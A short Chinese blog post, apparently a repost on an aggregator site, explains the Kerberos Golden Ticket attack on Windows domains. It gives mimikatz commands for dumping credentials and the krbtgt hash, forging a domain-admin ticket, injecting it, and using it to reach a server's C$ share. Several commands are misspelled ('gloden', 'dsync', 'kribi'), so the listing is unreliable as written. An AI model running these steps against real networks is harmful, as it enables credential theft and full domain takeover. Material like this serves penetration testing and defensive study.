黄金票据(Golden Ticket)的原理与实践
生活随笔
收集整理的這篇文章主要介紹了
黄金票据(Golden Ticket)的原理与实践
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
0、黃金票據是什么?
在與認證過程中,經過client與AS的通信會得到TGT,帶著TGT想TGS請求,得到票據ticket,用這個ticket可以來訪問應用服務器。如果這段有什么疑問,歡迎參考Kerberos認證協議分析。而這個黃金票據就是自己生成的TGT,在生成TGT的過程中,user、domain、timestamp、還有權限等信息會經過krbtgt(該賬號不自動更新)賬戶hash的加密,所以獲取到用戶、域、SID、krbtgt的hash值就可以生成黃金票據(一般拿到krbtgt需要域管權限,生成的票據當然也是域管賬號的,這樣就控了整個域,而且有了金票據,免除了as驗證username、password的階段,所以也不擔心域管密碼修改)。
1、名詞解釋
1.1 winlogon.exe
接受Username和Password、Domain信息,傳遞給lsass.exe。
1.2 lsass.exe
lsass.exe經過kerberos機制處理Username和Password后與SAM(賬號數據庫)進行比對驗證,返回登錄失敗的結果。
1.3 SAM數據庫
存儲賬號密碼Hash值的數據庫。
1.4 NetLogon
域認證的加密信道(安全信道sChannel)。
2、如何生成黃金票據
2.1 生成黃金票據需要的信息
2.1.1 windows域的名稱
PS C:\Users\Administrastor> systeminfo2.1.2 krbtgt和賬號信息簇
mimikatz# sekurlsa::kerberos mimikatz# sekurlsa::ticket /export mimikatz# sekurlsa::logonpassword mimikatz# lsadump::dsync /domain:xxx.xxx.xxx /user:krbtgt mimikatz# lsadump::lsa /patch -> sid+ntlm2.2 生成黃金票據
# 使用krbtgt的hash值: mimikatz# kerberos::gloden /user:Administrator /domain:xxx.xxx.xxx /sid:xxxxxxxxxxxxx krbtgt:ntlm-hashvlaue /ticket:test.kribi# 使用krbtgt的aes256值: mimikatz# kerberos::gloden /domain:xxx.xxx /sid:xxxxxxxxxxx /aes256:xxxxxxxx /user:Administrator /ticket:test.kribi3 黃金票據的使用
# 導入票據 mimikatz::ptt test.kribi#檢驗緩存票據 PS C:\Users\Administrastor> klist #利用票據訪問 PS C:\Users\Administrastor> net use \\xx.domain-name dir \\xx.domain-name\c$
轉載于:https://www.cnblogs.com/KevinGeorge/p/9337747.html
總結
以上是生活随笔為你收集整理的黄金票据(Golden Ticket)的原理与实践的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Java学习正嗨Day2!
- 下一篇: 编译原理概述